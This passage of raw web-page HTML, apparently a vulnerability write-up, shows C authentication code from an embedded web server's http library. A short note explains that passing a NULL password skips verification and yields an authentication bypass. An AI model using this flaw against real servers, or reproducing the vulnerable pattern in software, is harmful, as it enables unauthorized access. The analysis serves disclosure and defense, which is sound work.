Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 1686 PUBLIC bool httpLogin(HttpConn *conn, cchar *username, cchar *password)  1687 {  1688 HttpRx *rx;  1689 HttpAuth *auth;  1690 HttpSession *session;  1691 HttpVerifyUser verifyUser;  1692  1693 rx = conn-&gt;rx;  1694 auth = rx-&gt;route-&gt;auth;  1695 if (!username || !*username) {  1696 httpTrace(conn, &#8220;auth.login.error&#8221;, &#8220;error&#8221;, &#8220;msg:&#8217;missing username'&#8221;);  1697 return 0;  1698 }  1699 if (!auth-&gt;store) {  1700 mprLog(&#8220;error http auth&#8221;, 0, &#8220;No AuthStore defined&#8221;);  1701 return 0;  1702 }  1703 if ((verifyUser = auth-&gt;verifyUser) == 0) {  1704 if (!auth-&gt;parent || (verifyUser = auth-&gt;parent-&gt;verifyUser) == 0) {  1705 verifyUser = auth-&gt;store-&gt;verifyUser;  1706 }  1707 }  1708 if (!verifyUser) {  1709 mprLog(&#8220;error http auth&#8221;, 0, &#8220;No user verification routine defined on route %s&#8221;, rx-&gt;route-&gt;pattern);  1710 return 0;  1711 }  1712 if (auth-&gt;username &amp;&amp; *auth-&gt;username) {  1713 \/* If using auto-login, replace the username *\/  1714 username = auth-&gt;username;  1715 password = 0;  1716 }  1717 if (!(verifyUser)(conn, username, password)) {  1718 return 0;  1719 }  1720 if (!(auth-&gt;flags &amp; HTTP_AUTH_NO_SESSION) &amp;&amp; !auth-&gt;store-&gt;noSession) {  1721 if ((session = httpCreateSession(conn)) == 0) {  1722 \/* Too many sessions *\/  1723 return 0;  1724 }  1725 httpSetSessionVar(conn, HTTP_SESSION_USERNAME, username);  1726 httpSetSessionVar(conn, HTTP_SESSION_IP, conn-&gt;ip);  1727 }  1728 rx-&gt;authenticated = 1;  1729 rx-&gt;authenticateProbed = 1;  1730 conn-&gt;username = sclone(username);  1731 conn-&gt;encoded = 0;  1732 return 1;  1733 }     &lt;em&gt;File http\/httpLib.c \u2013 function configVerfiyUser()&lt;\/em&gt;  The following function will first check for the presence of a valid user, either because it was already set in the session, or because it was passed, since we are able to pass a null password (line 2031), we can bypass the actual checks and successfully authenticate reaching line 2055.    2014 \/*  2015 Verify the user password for the &#8220;config&#8221; store based on the users defined via configuration directives.  2016 Password may be NULL only if using auto-login.  2017 *\/  2018 static bool configVerifyUser(HttpConn *conn, cchar *username, cchar *password)  2019 {  2020 HttpRx *rx;  2021 HttpAuth *auth;  2022 bool success;  2023 char *requiredPassword;  2024  2025 rx = conn-&gt;rx;  2026 auth = rx-&gt;route-&gt;auth;  2027 if (!conn-&gt;user &amp;&amp; (conn-&gt;user = mprLookupKey(auth-&gt;userCache, username)) == 0) {  2028 httpTrace(conn, &#8220;auth.login.error&#8221;, &#8220;error&#8221;, &#8220;msg: &#8216;Unknown user&#8217;, username:&#8217;%s'&#8221;, username);  2029 return 0;  2030 }  2031 if (password) {  2032 if (auth-&gt;realm == 0 || *auth-&gt;realm == &#8216;\u0000&#8217;) {  2033 mprLog(&#8220;error http auth&#8221;, 0, &#8220;No AuthRealm defined&#8221;);  2034 }  2035 requiredPassword = (rx-&gt;passwordDigest) ? rx-&gt;passwordDigest : conn-&gt;user-&gt;password;  2036 if (sncmp(requiredPassword, &#8220;BF&#8221;, 2) == 0 &amp;&amp; slen(requiredPassword) &gt; 4 &amp;&amp; isdigit(requiredPassword[2]) &amp;&amp;  2037 requiredPassword[3] == &#8216;:&#8217;) {  2038 \/* Blowifsh *\/  2039 success = mprCheckPassword(sfmt(&#8220;%s:%s:%s&#8221;, username, auth-&gt;realm, password), conn-&gt;user-&gt;password);  2040  2041 } else {  2042 if (!conn-&gt;encoded) {  2043 password = mprGetMD5(sfmt(&#8220;%s:%s:%s&#8221;, username, auth-&gt;realm, password));  2044 conn-&gt;encoded = 1;  2045 }  2046 success = smatch(password, requiredPassword);  2047 }  2048 if (success) {  2049 httpTrace(conn, &#8220;auth.login.authenticated&#8221;, &#8220;context&#8221;, &#8220;msg:&#8217;User authenticated&#8217;, username:&#8217;%s'&#8221;, username);  2050 } else {  2051 httpTrace(conn, &#8220;auth.login.error&#8221;, &#8220;error&#8221;, &#8220;msg:&#8217;Password failed to authenticate&#8217;, username:&#8217;%s'&#8221;, username);  2052 }  2053 return success;  2054 }  2055 return 1;  2056 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3985105449381-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3985105449381-95\">95<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-1\"><span class=\"crayon-cn\">1686<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">PUBLIC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpLogin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HttpConn *<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cchar *<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cchar *<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-2\"><span class=\"crayon-cn\">1687<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-3\"><span class=\"crayon-cn\">1688<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpRx *<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-4\"><span class=\"crayon-cn\">1689<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpAuth *<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-5\"><span class=\"crayon-cn\">1690<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpSession *<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-6\"><span class=\"crayon-cn\">1691<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpVerifyUser <\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-7\"><span class=\"crayon-cn\">1692<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-8\"><span class=\"crayon-cn\">1693<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-9\"><span class=\"crayon-cn\">1694<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">route<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-10\"><span class=\"crayon-cn\">1695<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-11\"><span class=\"crayon-cn\">1696<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;auth.login.error&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;error&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;msg:&#8217;missing username'&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-12\"><span class=\"crayon-cn\">1697<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-13\"><span class=\"crayon-cn\">1698<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-14\"><span class=\"crayon-cn\">1699<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">store<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-15\"><span class=\"crayon-cn\">1700<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprLog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;error http auth&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;No AuthStore defined&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-16\"><span class=\"crayon-cn\">1701<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-17\"><span class=\"crayon-cn\">1702<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-18\"><span class=\"crayon-cn\">1703<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-19\"><span class=\"crayon-cn\">1704<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-r\">parent<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-r\">parent<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-20\"><span class=\"crayon-cn\">1705<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">store<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-21\"><span class=\"crayon-cn\">1706<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-22\"><span class=\"crayon-cn\">1707<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-23\"><span class=\"crayon-cn\">1708<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-24\"><span class=\"crayon-cn\">1709<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprLog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;error http auth&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;No user verification routine defined on route %s&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">route<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">pattern<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-25\"><span class=\"crayon-cn\">1710<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-26\"><span class=\"crayon-cn\">1711<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-27\"><span class=\"crayon-cn\">1712<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-28\"><span class=\"crayon-cn\">1713<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* If using auto-login, replace the username *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-29\"><span class=\"crayon-cn\">1714<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-30\"><span class=\"crayon-cn\">1715<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-31\"><span class=\"crayon-cn\">1716<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-32\"><span class=\"crayon-cn\">1717<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span 